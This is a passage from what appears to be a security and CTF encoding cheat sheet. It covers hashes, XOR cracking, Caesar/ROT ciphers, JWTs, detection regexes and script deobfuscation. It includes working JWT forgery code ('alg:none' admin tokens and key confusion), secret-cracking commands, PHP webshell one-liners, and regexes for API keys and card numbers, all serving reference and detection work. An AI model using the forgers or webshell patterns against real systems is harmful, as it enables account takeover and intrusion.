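            f"{proof.hex()}:{blob.hex()}")

# Made-up inputs purely to show the shape of the output line
challenge = bytes.fromhex("1122334455667788")
blob = bytes.fromhex("0101000000000000")
proof = nt_proof_str(b"\x00" * 16, challenge, blob)
print(format_netntlmv2("alice", "CORP", challenge, proof, blob))
```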

Multi-hash utility

import hashlib

def multi_hash(data: bytes) -> dict[str, str]:
    """Compute multiple hashes simultaneously."""
    algorithms = ['md5', 'sha1', 'sha256', 'sha512']
    return {algo: hashlib.new(algo, data).hexdigest() for algo in algorithms}

result = multi_hash(b"password")
for algo, digest in result.items():
    print(f"{algo:>8}: {digest}")

# Hash identification by length
HASH_LENGTHS = {
    32: ['MD5', 'NTLM', 'MD4'],
    40: ['SHA-1'],
    56: ['SHA-224'],
    64: ['SHA-256'],
    96: ['SHA-384'],
    128: ['SHA-512'],
}

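def identify_hash(h: str) -> list[str]:
    """Identify possible hash types by hex-digest length."""
    h = h.strip()
    # Anything that is not pure hex cannot be one of the raw digests above
    if not h or any(c not in '0123456789abcdefABCDEF' for c in h):
        return ['Unknown']
    # Length alone cannot separate MD5, MD4, and NTLM (all 32 hex characters);
    # use context such as the source file or protocol to decide
    return HASH_LENGTHS.get(len(h), ['Unknown'])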

# Compute all hashes at once
echo -n "password" | tee >(md5sum) >(sha1sum) >(sha256sum) >(sha512sum) > /dev/null

# Hash identification with hashid (pip install hashid)
hashid '5f4dcc3b5aa765d61d8327deb882cf99'

# Hash identification with hash-identifier or haiti
haiti '5f4dcc3b5aa765d61d8327deb882cf99'

7. XOR

Single-byte XOR

def xor_single_byte(data: bytes, key: int) -> bytes:
    """XOR every byte of data with a single key byte."""
    return bytes(b ^ key for b in data)

# Encrypt
plaintext = b"attack at dawn"
key = 0x42
ciphertext = xor_single_byte(plaintext, key)
print(ciphertext.hex())   # '233636232129622336622623352c'

# Decrypt (same operation)
recovered = xor_single_byte(ciphertext, key)
assert recovered == plaintext

Multi-byte XOR

from itertools import cycle

def xor_multi_byte(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating multi-byte key."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

plaintext = b"The quick brown fox jumps over the lazy dog"
key = b"SECRET"
ciphertext = xor_multi_byte(plaintext, key)
recovered = xor_multi_byte(ciphertext, key)
assert recovered == plaintext

Single-byte XOR brute force

def xor_bruteforce(ciphertext: bytes) -> list[tuple[int, bytes, float]]:
    """Brute force all 256 single-byte XOR keys. Score by ratio of ASCII letters and spaces."""
    results = []
    for key in range(256):
        candidate = xor_single_byte(ciphertext, key)
        # A plain printable-ASCII ratio ties for many keys on short inputs,
        # so count only letters and spaces, which dominate English text.
        texty = sum(1 for b in candidate
                    if b == 0x20 or 0x41 <= b <= 0x5a or 0x61 <= b <= 0x7a)
        score = texty / len(candidate)
        results.append((key, candidate, score))
    results.sort(key=lambda x: x[2], reverse=True)
    return results

# Example: recover the key for the ciphertext from the single-byte example (key 0x42)
encoded = bytes.fromhex('233636232129622336622623352c')
for key, candidate, score in xor_bruteforce(encoded)[:3]:
    print(f"Key 0x{key:02x} ({score:.0%}): {candidate}")
# Top result: Key 0x42 (100%): b'attack at dawn'

Known-plaintext XOR attack

def xor_known_plaintext(ciphertext: bytes, known_plain: bytes, offset: int = 0) -> bytes:
    """Recover XOR key using known plaintext at a known offset."""
    key_fragment = bytes(c ^ p for c, p in zip(ciphertext[offset:], known_plain))
    return key_fragment

# Example: PE files always start with 'MZ' (0x4d5a)
# If XOR-encoded PE is found, recover first 2 key bytes:
encoded_pe = b'\x1f\x28\x90\x00...'  # hypothetical
known = b'MZ'
key_start = xor_known_plaintext(encoded_pe, known)
print(f"Key starts with: {key_start.hex()}")

# Known plaintext for common file types:
# PE/DLL:   b'MZ' (4d5a)
# ELF:      b'\x7fELF' (7f454c46)
# PDF:      b'%PDF' (25504446)
# ZIP/DOCX: b'PK\x03\x04' (504b0304)
# GZIP:     b'\x1f\x8b' (1f8b)
# PNG:      b'\x89PNG\r\n\x1a\n' (89504e470d0a1a0a)
# JPEG:     b'\xff\xd8\xff' (ffd8ff)

# Estimate repeating key length using normalized Hamming distance between blocks
# (distinct from Kasiski examination, which looks for repeated ciphertext substrings)
def hamming_distance(b1: bytes, b2: bytes) -> int:
    return sum(bin(a ^ b).count('1') for a, b in zip(b1, b2))

def guess_key_length(ciphertext: bytes, max_len: int = 40) -> list[tuple[int, float]]:
    """Estimate repeating XOR key length via normalized Hamming distance."""
    scores = []
    for kl in range(2, max_len + 1):
        blocks = [ciphertext[i*kl:(i+1)*kl] for i in range(4)]
        if len(blocks[3]) < kl:
            continue
        distances = []
        for i in range(len(blocks)):
            for j in range(i+1, len(blocks)):
                distances.append(hamming_distance(blocks[i], blocks[j]) / kl)
        avg = sum(distances) / len(distances)
        scores.append((kl, avg))
    scores.sort(key=lambda x: x[1])
    return scores[:5]
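
Once a key length is known or guessed, each key byte can be recovered independently, because every key_len-th ciphertext byte was XORed with the same key byte. The following is a minimal sketch under the assumption that the plaintext is mostly English letters and spaces; repeating_xor, english_score, and recover_repeating_key are hypothetical names, and the scoring is deliberately crude.

```python
from itertools import cycle

def repeating_xor(data: bytes, key: bytes) -> bytes:
    """XOR data with a repeating key (encrypts and decrypts)."""
    return bytes(d ^ k for d, k in zip(data, cycle(key)))

def english_score(data: bytes) -> int:
    """Count bytes that are ASCII letters or spaces."""
    return sum(1 for b in data
               if b == 0x20 or 0x41 <= b <= 0x5A or 0x61 <= b <= 0x7A)

def recover_repeating_key(ciphertext: bytes, key_len: int) -> bytes:
    """Solve each key byte as an independent single-byte XOR problem."""
    key = bytearray()
    for offset in range(key_len):
        column = ciphertext[offset::key_len]   # bytes sharing one key byte
        best = max(range(256),
                   key=lambda k: english_score(bytes(b ^ k for b in column)))
        key.append(best)
    return bytes(key)

sample = b"the quick brown fox jumps over the lazy dog " * 4
ct = repeating_xor(sample, b"KEY")
key = recover_repeating_key(ct, 3)
print(key, repeating_xor(ct, key)[:19])   # b'KEY' b'the quick brown fox'
```

In practice the candidate lengths from guess_key_length would be tried in order, keeping the length whose recovered plaintext scores best.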

# XOR with Python one-liner
python3 -c "
data = bytes.fromhex('233636232129622336622623352c')
key = 0x42
print(bytes(b ^ key for b in data))   # b'attack at dawn'
"

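# Analyze an XOR-encrypted file with xortool
# pip install xortool
xortool encrypted.bin                   # estimate probable key lengths
xortool -l 4 -c 00 encrypted.bin        # key length 4, assume 0x00 is the most frequent plaintext byte
xortool -b -l 4 encrypted.bin           # key length 4, brute-force the most frequent byte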

8. ROT13 / ROT47 / Caesar

ROT13 (letters only, A-Z / a-z shifted by 13)

import codecs

# Encode/Decode (symmetric — same operation)
encoded = codecs.encode("Attack at dawn", "rot_13")    # "Nggnpx ng qnja"
decoded = codecs.encode(encoded, "rot_13")             # "Attack at dawn"

# Manual implementation
def rot13(text: str) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + 13) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + 13) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

echo "Attack at dawn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Nggnpx ng qnja
echo "Nggnpx ng qnja" | tr 'A-Za-z' 'N-ZA-Mn-za-m'    # Attack at dawn

# Alternative
echo "Attack at dawn" | rot13   # if rot13 command available

ROT47 (printable ASCII 33-126, shifted by 47)

def rot47(text: str) -> str:
    """ROT47: rotate printable ASCII characters (! through ~)."""
    result = []
    for c in text:
        o = ord(c)
        if 33 <= o <= 126:
            result.append(chr(33 + (o - 33 + 47) % 94))
        else:
            result.append(c)
    return ''.join(result)

encoded = rot47("Attack at dawn!")     # "pEE24< 2E 52H?P"
decoded = rot47(encoded)               # "Attack at dawn!"

echo "Attack at dawn!" | tr '!-~' 'P-~!-O'

General Caesar cipher (arbitrary shift)

def caesar(text: str, shift: int) -> str:
    result = []
    for c in text:
        if 'a' <= c <= 'z':
            result.append(chr((ord(c) - ord('a') + shift) % 26 + ord('a')))
        elif 'A' <= c <= 'Z':
            result.append(chr((ord(c) - ord('A') + shift) % 26 + ord('A')))
        else:
            result.append(c)
    return ''.join(result)

# Brute force all 26 shifts
def caesar_bruteforce(ciphertext: str) -> list[tuple[int, str]]:
    return [(shift, caesar(ciphertext, shift)) for shift in range(26)]

# Example: CTF challenge
for shift, candidate in caesar_bruteforce("Gur synt vf PGS{ebg13_vf_rnfl}"):
    if 'CTF' in candidate or 'flag' in candidate.lower():
        print(f"Shift {shift}: {candidate}")
# Shift 13: The flag is CTF{rot13_is_easy}

9. JWT (JSON Web Tokens)

Decode JWT (no verification)

import base64
import json

def jwt_decode(token: str) -> dict:
    """Decode JWT without verification — forensic/analysis use."""
    parts = token.split('.')
    if len(parts) != 3:
        raise ValueError("Invalid JWT format")

    def decode_part(part: str) -> dict:
        # Add padding
        padded = part + '=' * (-len(part) % 4)
        decoded = base64.urlsafe_b64decode(padded)
        return json.loads(decoded)

    header = decode_part(parts[0])
    payload = decode_part(parts[1])
    signature = parts[2]

    return {
        'header': header,
        'payload': payload,
        'signature': signature,
        'raw_parts': parts
    }

# Example
token = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c"
result = jwt_decode(token)
print(json.dumps(result['header'], indent=2))
# {"alg": "HS256", "typ": "JWT"}
print(json.dumps(result['payload'], indent=2))
# {"sub": "1234567890", "name": "John Doe", "iat": 1516239022}

# Bash — decode JWT
echo "eyJhbGciOiJIUzI1NiJ9" | base64 -d 2>/dev/null
# {"alg":"HS256"}

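# Full decode (JWT segments are unpadded Base64url: translate the alphabet and re-pad first)
TOKEN="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIn0.dozjgNryP4J3jVmNHl0w5N_XgL0n3I9PlFUP0THsR8U"
PAYLOAD=$(echo "$TOKEN" | cut -d. -f2 | tr '_-' '/+')
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
echo "$PAYLOAD" | base64 -d | python3 -m json.tool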

Forge JWT with alg:none attack (CVE-2015-9235)

import base64
import json

def jwt_forge_none(payload: dict) -> str:
    """Forge JWT with alg:none — exploits servers that don't verify algorithm."""
    header = {"alg": "none", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    return f"{encode_part(header)}.{encode_part(payload)}."

# Forge admin token
forged = jwt_forge_none({
    "sub": "1",
    "name": "admin",
    "role": "admin",
    "iat": 1516239022
})
print(forged)
# eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJzdWIiOiIxIiwibmFtZSI6ImFkbWluIiwicm9sZSI6ImFkbWluIiwiaWF0IjoxNTE2MjM5MDIyfQ.

# Variations that bypass filters:
# "alg": "None"
# "alg": "NONE"
# "alg": "nOnE"

Forge JWT with HMAC/RSA confusion (CVE-2016-10555)

import hmac
import hashlib
import base64
import json

def jwt_forge_hmac_rsa_confusion(payload: dict, public_key: bytes) -> str:
    """
    If server uses RS256 but accepts HS256, sign with the PUBLIC key as HMAC secret.
    The server will verify using the public key as HMAC key — signature matches.
    """
    header = {"alg": "HS256", "typ": "JWT"}

    def encode_part(data: dict) -> str:
        return base64.urlsafe_b64encode(
            json.dumps(data, separators=(',', ':')).encode()
        ).rstrip(b'=').decode()

    header_b64 = encode_part(header)
    payload_b64 = encode_part(payload)
    signing_input = f"{header_b64}.{payload_b64}".encode()

    signature = hmac.new(public_key, signing_input, hashlib.sha256).digest()
    sig_b64 = base64.urlsafe_b64encode(signature).rstrip(b'=').decode()

    return f"{header_b64}.{payload_b64}.{sig_b64}"

# Usage: obtain server's public key (often in /.well-known/jwks.json or /api/public-key)
# with open("public.pem", "rb") as f:
#     forged = jwt_forge_hmac_rsa_confusion({"sub": "admin"}, f.read())

Crack JWT secret (HS256)

# Using hashcat
hashcat -m 16500 jwt.txt wordlist.txt

# Using john the ripper
john jwt.txt --wordlist=wordlist.txt --format=HMAC-SHA256

# Using jwt_tool (pip install jwt_tool)
python3 jwt_tool.py <token> -C -d wordlist.txt

import hmac
import hashlib
import base64

def jwt_crack(token: str, wordlist_path: str) -> str | None:
    """Brute-force HS256 JWT secret from a wordlist."""
    parts = token.split('.')
    signing_input = f"{parts[0]}.{parts[1]}".encode()
    target_sig = base64.urlsafe_b64decode(parts[2] + '==')

    with open(wordlist_path, 'r', errors='ignore') as f:
        for line in f:
            secret = line.strip()
            computed = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
            if hmac.compare_digest(computed, target_sig):
                return secret
    return None

JWT security checklist

Attack	Condition	Mitigation
alg:none	Server accepts unsigned tokens	Reject `none` algorithm; whitelist allowed algorithms
HMAC/RSA confusion	Server accepts HS256 when configured for RS256	Enforce algorithm in server config, not from token header
Weak secret	Short/guessable HMAC key	Use 256+ bit random secret
No expiry	Missing `exp` claim	Always set and validate `exp`
kid injection	`kid` header used in SQL/file lookup	Sanitize `kid`, use allowlist
jwk/jku injection	Server fetches attacker-controlled key	Whitelist key sources
Claim tampering	Only signature checked, not claims	Validate all security-relevant claims server-side

10. Regular Expressions for Security

IPv4 / IPv6

import re

# IPv4 — strict
IPV4 = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\b'
)

# IPv4 with CIDR
IPV4_CIDR = re.compile(
    r'\b(?:(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)\.){3}'
    r'(?:25[0-5]|2[0-4]\d|1\d{2}|[1-9]?\d)(?:/\d{1,2})?\b'
)

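# IPv6: simplified (full 8-group form, or a "::"-compressed form; no zone IDs or embedded IPv4)
# The compressed branch requires a literal "::" so that a lone ":" never matches
IPV6 = re.compile(
    r'\b(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}\b'
    r'|(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4})*)?::'
    r'(?:[0-9a-fA-F]{1,4}(?::[0-9a-fA-F]{1,4})*)?'
)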

# Private/RFC1918 ranges
PRIVATE_IPV4 = re.compile(
    r'\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|'
    r'172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|'
    r'192\.168\.\d{1,3}\.\d{1,3})\b'
)
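
The private-range pattern above checks shape only: `\d{1,3}` also accepts octets such as 999. One way to tighten this, sketched here under the assumption that a loose regex finds candidates and the standard `ipaddress` module does the validation, is shown below. `CANDIDATE`, `RFC1918`, and `classify_ipv4` are illustrative names.

```python
import ipaddress
import re

# Loose candidate pattern; range validation is delegated to ipaddress
CANDIDATE = re.compile(r'(?<![\d.])\d{1,3}(?:\.\d{1,3}){3}(?!\.?\d)')

RFC1918 = [ipaddress.ip_network(n)
           for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def classify_ipv4(text: str) -> dict[str, list[str]]:
    """Sort dotted-quad candidates into RFC 1918, other valid, and invalid."""
    result: dict[str, list[str]] = {"private": [], "other": [], "invalid": []}
    for candidate in CANDIDATE.findall(text):
        try:
            addr = ipaddress.IPv4Address(candidate)
        except ValueError:
            # Out-of-range octets, leading zeros, and similar
            result["invalid"].append(candidate)
            continue
        bucket = "private" if any(addr in net for net in RFC1918) else "other"
        result[bucket].append(candidate)
    return result
```

"other" here means "valid but outside RFC 1918"; it still includes loopback and link-local addresses.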

URLs

URL = re.compile(
    r'https?://(?:[\w-]+\.)+[\w]{2,}'      # scheme + domain
    r'(?::\d{1,5})?'                         # optional port
    r'(?:/[^\s\'"<>]*)?'                     # optional path
)

# Extract domain from URL
DOMAIN = re.compile(r'https?://([^/:]+)')

Email

EMAIL = re.compile(
    r'\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b'
)

Hashes (for IOC extraction)

MD5_RE    = re.compile(r'\b[0-9a-fA-F]{32}\b')
SHA1_RE   = re.compile(r'\b[0-9a-fA-F]{40}\b')
SHA256_RE = re.compile(r'\b[0-9a-fA-F]{64}\b')
SHA512_RE = re.compile(r'\b[0-9a-fA-F]{128}\b')

CVE IDs

CVE = re.compile(r'CVE-\d{4}-\d{4,}')

Credit card numbers (PCI DSS scanning)

# Visa
VISA = re.compile(r'\b4\d{3}[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# Mastercard (51-55 prefixes, plus the 2221-2720 range)
MC = re.compile(r'\b(?:5[1-5]\d{2}|222[1-9]|22[3-9]\d|2[3-6]\d{2}|27[01]\d|2720)[\s-]?\d{4}[\s-]?\d{4}[\s-]?\d{4}\b')

# AMEX
AMEX = re.compile(r'\b3[47]\d{2}[\s-]?\d{6}[\s-]?\d{5}\b')

# Generic (13-19 digits, optionally separated)
CC_GENERIC = re.compile(r'\b(?:\d[\s-]?){13,19}\b')

def luhn_check(number: str) -> bool:
    """Validate credit card number with Luhn algorithm."""
    digits = [int(d) for d in number if d.isdigit()]
    digits.reverse()
    total = 0
    for i, d in enumerate(digits):
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0

# US Social Security number (format only)
SSN = re.compile(r'\b\d{3}-\d{2}-\d{4}\b')
# Stricter (excludes known invalid ranges)
SSN_STRICT = re.compile(
    r'\b(?!000|666|9\d{2})\d{3}-(?!00)\d{2}-(?!0000)\d{4}\b'
)
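
The card patterns and the Luhn check above are most useful together: a generic digit pattern finds candidates and Luhn discards most random digit runs. A self-contained sketch of that pipeline follows; `CARD_CANDIDATE`, `find_card_numbers`, and `mask_pan` are names chosen for this example, and the masking format (first six and last four digits) is an assumption about what a report should show.

```python
import re

# 13-19 digits, each optionally followed by a single space or hyphen
CARD_CANDIDATE = re.compile(r'\b(?:\d[ -]?){12,18}\d\b')


def luhn_ok(number: str) -> bool:
    """Luhn checksum over the digits in number."""
    digits = [int(c) for c in number if c.isdigit()]
    total = 0
    for i, d in enumerate(reversed(digits)):
        if i % 2 == 1:          # every second digit from the right
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return bool(digits) and total % 10 == 0


def find_card_numbers(text: str) -> list[str]:
    """Return digit-only card candidates that pass the Luhn check."""
    hits = []
    for match in CARD_CANDIDATE.finditer(text):
        digits = re.sub(r'\D', '', match.group())
        if 13 <= len(digits) <= 19 and luhn_ok(digits):
            hits.append(digits)
    return hits


def mask_pan(pan: str) -> str:
    """Keep first six and last four digits so findings can be reported safely."""
    return pan[:6] + '*' * (len(pan) - 10) + pan[-4:]
```

Luhn only reduces false positives; roughly one in ten random digit strings still passes, so hits need context before being treated as real card data.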

API keys and secrets

# AWS Access Key ID
AWS_KEY = re.compile(r'\b(?:AKIA|ABIA|ACCA|ASIA)[0-9A-Z]{16}\b')

# AWS Secret Access Key
AWS_SECRET = re.compile(r'(?<![A-Za-z0-9/+=])[A-Za-z0-9/+=]{40}(?![A-Za-z0-9/+=])')

# GitHub Personal Access Token
GITHUB_PAT = re.compile(r'\bghp_[A-Za-z0-9]{36}\b')
GITHUB_PAT_FINE = re.compile(r'\bgithub_pat_[A-Za-z0-9_]{82}\b')

# Slack Bot Token
SLACK_BOT = re.compile(r'\bxoxb-\d{10,13}-\d{10,13}-[a-zA-Z0-9]{24}\b')

# Slack Webhook
SLACK_WEBHOOK = re.compile(r'https://hooks\.slack\.com/services/T[A-Z0-9]{8}/B[A-Z0-9]{8}/[a-zA-Z0-9]{24}')

# Google API Key
GOOGLE_API = re.compile(r'\bAIza[0-9A-Za-z_-]{35}\b')

# Generic high-entropy string (potential secret)
import math
def entropy(s: str) -> float:
    freq = {}
    for c in s:
        freq[c] = freq.get(c, 0) + 1
    return -sum((f/len(s)) * math.log2(f/len(s)) for f in freq.values())

# Strings > 20 chars with entropy > 4.5 are suspicious
GENERIC_SECRET = re.compile(r'(?:key|token|secret|password|api_key|apikey|access_key)\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})["\']?', re.IGNORECASE)

# Private key markers
PRIVATE_KEY = re.compile(r'-----BEGIN (?:RSA |EC |DSA |OPENSSH )?PRIVATE KEY-----')

# JWT pattern
JWT_RE = re.compile(r'\beyJ[A-Za-z0-9_-]*\.eyJ[A-Za-z0-9_-]*\.[A-Za-z0-9_-]*\b')
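
The entropy helper and the generic assignment pattern above are meant to be used as a pair: the regex finds values assigned to secret-looking names, and entropy filters out placeholders. A sketch of that combination is below, with `ASSIGNMENT`, `shannon_entropy`, and `find_likely_secrets` as illustrative names. Note that a string of length n cannot exceed log2(n) bits per character, so the 4.5 threshold can only be met by values with at least 23 distinct characters.

```python
import math
import re
from collections import Counter

# Value assigned to a name containing key/token/secret/password
ASSIGNMENT = re.compile(
    r'(?:key|token|secret|password)\w*\s*[=:]\s*["\']?([A-Za-z0-9+/=_-]{20,})',
    re.IGNORECASE,
)


def shannon_entropy(s: str) -> float:
    """Shannon entropy in bits per character."""
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in Counter(s).values())


def find_likely_secrets(text: str, min_entropy: float = 4.5) -> list[str]:
    """Return assigned values whose entropy meets the threshold."""
    return [value for value in ASSIGNMENT.findall(text)
            if shannon_entropy(value) >= min_entropy]
```

Lowering `min_entropy` catches shorter secrets at the cost of more false positives; the right value depends on the corpus being scanned.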

Combined IOC extractor

def extract_iocs(text: str) -> dict[str, list[str]]:
    """Extract all security-relevant indicators from text."""
    return {
        'ipv4': list(set(IPV4.findall(text))),
        'email': list(set(EMAIL.findall(text))),
        'url': list(set(URL.findall(text))),
        'md5': list(set(MD5_RE.findall(text))),
        'sha1': list(set(SHA1_RE.findall(text))),
        'sha256': list(set(SHA256_RE.findall(text))),
        'cve': list(set(CVE.findall(text))),
        'aws_key': list(set(AWS_KEY.findall(text))),
        'github_pat': list(set(GITHUB_PAT.findall(text))),
        'jwt': list(set(JWT_RE.findall(text))),
        'private_key': list(set(PRIVATE_KEY.findall(text))),
    }

11. Obfuscation & Deobfuscation

JavaScript obfuscation patterns

# --- JSFuck (encode JS using only the six characters []()!+ ) ---
# 's' becomes: (![]+[])[+!+[]+!+[]+!+[]]   i.e. "false"[3]
# Every other character is built up the same way from those six

# --- Hex escape obfuscation ---
# eval("\x61\x6c\x65\x72\x74\x28\x31\x29")  ->  eval("alert(1)")

# --- Unicode escape ---
# \u0061\u006c\u0065\u0072\u0074(1)  ->  alert(1)

# --- String.fromCharCode ---
# eval(String.fromCharCode(97,108,101,114,116,40,49,41))  ->  eval("alert(1)")

# --- Deobfuscate String.fromCharCode ---
def deobfuscate_charcode(js: str) -> str:
    """Deobfuscate String.fromCharCode() calls."""
    import re
    pattern = r'String\.fromCharCode\(([\d,\s]+)\)'
    def replace(m):
        chars = [int(c.strip()) for c in m.group(1).split(',')]
        return repr(''.join(chr(c) for c in chars))
    return re.sub(pattern, replace, js)

# --- Deobfuscate hex/unicode escapes ---
def deobfuscate_js_escapes(js: str) -> str:
    """Resolve \\xNN and \\uNNNN escapes in JavaScript strings."""
    import re
    # \xNN
    result = re.sub(r'\\x([0-9a-fA-F]{2})',
                    lambda m: chr(int(m.group(1), 16)), js)
    # \uNNNN
    result = re.sub(r'\\u([0-9a-fA-F]{4})',
                    lambda m: chr(int(m.group(1), 16)), result)
    return result

# --- Deobfuscate atob() (base64 in JS) ---
# atob("YWxlcnQoMSk=") -> "alert(1)"
def deobfuscate_atob(js: str) -> str:
    import re, base64
    pattern = r'atob\(["\']([A-Za-z0-9+/=]+)["\']\)'
    def replace(m):
        return repr(base64.b64decode(m.group(1)).decode())
    return re.sub(pattern, replace, js)

PowerShell obfuscation patterns

# --- Encoded command ---
# powershell -enc <base64 of UTF-16LE>
import base64
def decode_ps_encoded_command(encoded: str) -> str:
    return base64.b64decode(encoded).decode('utf-16-le')

# --- String concatenation ---
# 'Inv'+'oke'+'-Exp'+'ression' -> 'Invoke-Expression'

# --- Backtick escaping ---
# In`vo`ke-Ex`pre`ssi`on -> Invoke-Expression
def deobfuscate_backticks(ps: str) -> str:
    import re
    # Drop backticks before ordinary characters; keep real escape sequences
    # such as `n, `t, `0 (a backtick placed before one of 0abfnrtv is left alone)
    return re.sub(r'`([^0abfnrtv])', r'\1', ps)

# --- [char] casts ---
# [char]73 + [char]69 + [char]88 evaluates to 'IEX'; this pass rewrites it to I + E + X
def deobfuscate_char_cast(ps: str) -> str:
    import re
    def replace(m):
        return chr(int(m.group(1)))
    return re.sub(r'\[char\]\s*(\d+)', replace, ps, flags=re.IGNORECASE)

# --- Environment variable concatenation ---
# $env:comspec[4,15,25]-join'' -> 'Iex'  (characters 4, 15, 25 of 'C:\WINDOWS\system32\cmd.exe'; PowerShell command names are case-insensitive)

# --- Compressed / deflate streams ---
# IEX(New-Object IO.StreamReader((New-Object IO.Compression.DeflateStream(
#   [IO.MemoryStream][Convert]::FromBase64String('...'),
#   [IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()

def decode_ps_deflate(b64_data: str) -> str:
    import base64, zlib
    compressed = base64.b64decode(b64_data)
    # PowerShell uses raw deflate (no zlib header), wbits=-15
    return zlib.decompress(compressed, -15).decode('utf-8', errors='replace')

# --- Combined deobfuscation pipeline ---
def deobfuscate_powershell(script: str) -> str:
    script = deobfuscate_backticks(script)
    script = deobfuscate_char_cast(script)
    # Remove common no-op patterns
    script = script.replace("( ", "(").replace(" )", ")")
    return script
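
To test the decoders above without a live sample, it helps to produce the same encodings from Python. The sketch below round-trips both the `-enc` format (Base64 over UTF-16LE) and the Base64 plus raw-deflate format; the function names are illustrative and the input strings are harmless placeholders.

```python
import base64
import zlib


def encode_ps_command(command: str) -> str:
    """Build the argument that powershell -enc expects: Base64 over UTF-16LE."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_ps_command(encoded: str) -> str:
    """Inverse of encode_ps_command."""
    return base64.b64decode(encoded).decode("utf-16-le")


def deflate_b64(script: str) -> str:
    """Raw deflate (wbits=-15, no zlib header) followed by Base64."""
    comp = zlib.compressobj(level=9, wbits=-15)
    raw = comp.compress(script.encode("utf-8")) + comp.flush()
    return base64.b64encode(raw).decode("ascii")


def inflate_b64(blob: str) -> str:
    """Inverse of deflate_b64."""
    raw = zlib.decompress(base64.b64decode(blob), -15)
    return raw.decode("utf-8", errors="replace")


print(encode_ps_command("whoami"))   # dwBoAG8AYQBtAGkA
```

The telltale sign of an encoded command is the alternating `A` characters, which come from the zero high bytes of UTF-16LE ASCII text.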

Python obfuscation patterns

# --- exec(compile()) ---
# exec(compile(base64.b64decode(b'cHJpbnQoImhlbGxvIik='),'<string>','exec'))

# --- Lambda chains ---
# (lambda: (lambda f: f(f))(lambda f: print("hello")))()

# --- Marshal/bytecode ---
import marshal, types
code = compile("print('hello')", "<string>", "exec")
serialized = marshal.dumps(code)
# Reconstruct: exec(marshal.loads(serialized))

# --- Deobfuscation: extract strings from exec/eval ---
def safe_deobfuscate_exec(code: str) -> str:
    """Replace exec/eval with print to see what would execute."""
    import re
    code = re.sub(r'\bexec\s*\(', 'print(', code)
    code = re.sub(r'\beval\s*\(', 'print(', code)
    return code
# WARNING: Only run deobfuscated code in a sandbox/VM

PHP obfuscation patterns

// Common patterns in webshells:

// eval(base64_decode('...'))
// eval(gzinflate(base64_decode('...')))
// eval(str_rot13('...'))
// preg_replace('/.*/e', base64_decode('...'), '')   // /e modifier = eval (PHP < 7)
// assert(base64_decode('...'))                       // acts like eval
// create_function('', base64_decode('...'))          // anonymous eval

// Variable function calls (hiding function names):
// $f = 'sys'.'tem'; $f('whoami');
// $_GET['cmd']($_GET['arg']);                         // webshell one-liner

// chr() obfuscation:
// $f = chr(115).chr(121).chr(115).chr(116).chr(101).chr(109); $f('id');

# Deobfuscate PHP eval(base64_decode(...))
import re
import base64

def deobfuscate_php_b64(php_code: str) -> str:
    pattern = r'(?:eval|assert)\s*\(\s*base64_decode\s*\(\s*[\'"]([A-Za-z0-9+/=]+)[\'"]\s*\)\s*\)'
    def replace(m):
        decoded = base64.b64decode(m.group(1)).decode('utf-8', errors='replace')
        return f'/* DECODED: */ {decoded}'
    return re.sub(pattern, replace, php_code)

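# Deobfuscate PHP chr() chains
def deobfuscate_php_chr(php_code: str) -> str:
    """Collapse chr(N).chr(M)... chains into one quoted string literal."""
    chain = re.compile(r'chr\(\s*\d+\s*\)(?:\s*\.\s*chr\(\s*\d+\s*\))*')
    def replace(m):
        codes = re.findall(r'chr\(\s*(\d+)\s*\)', m.group(0))
        # PHP's chr() wraps its argument modulo 256
        return "'" + ''.join(chr(int(c) % 256) for c in codes) + "'"
    # Dots outside chr() chains (other concatenations, file names) are left untouched
    return chain.sub(replace, php_code)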

12. Serialization Security

JSON

import json

# Standard encode/decode
data = {"user": "admin", "role": "user"}
encoded = json.dumps(data)
decoded = json.loads(encoded)

# Security: JSON injection via key/value manipulation
# If user controls a JSON key or value without escaping:
# {"user": "admin", "role": "user"} could become
# {"user": "admin", "role": "admin"} via parameter pollution

# JSON comment stripping (some parsers accept comments)
# {"key": "value" /* comment */}  -> invalid JSON but some libs accept it

# Large number handling (precision loss)
# JavaScript: JSON.parse('{"id": 9999999999999999}') -> 10000000000000000
# Python handles arbitrary precision; JS does not

# Duplicate key behavior (parser-dependent)
json.loads('{"a": 1, "a": 2}')  # Python: {'a': 2} (last wins)
# Other parsers may take first, error, or behave inconsistently
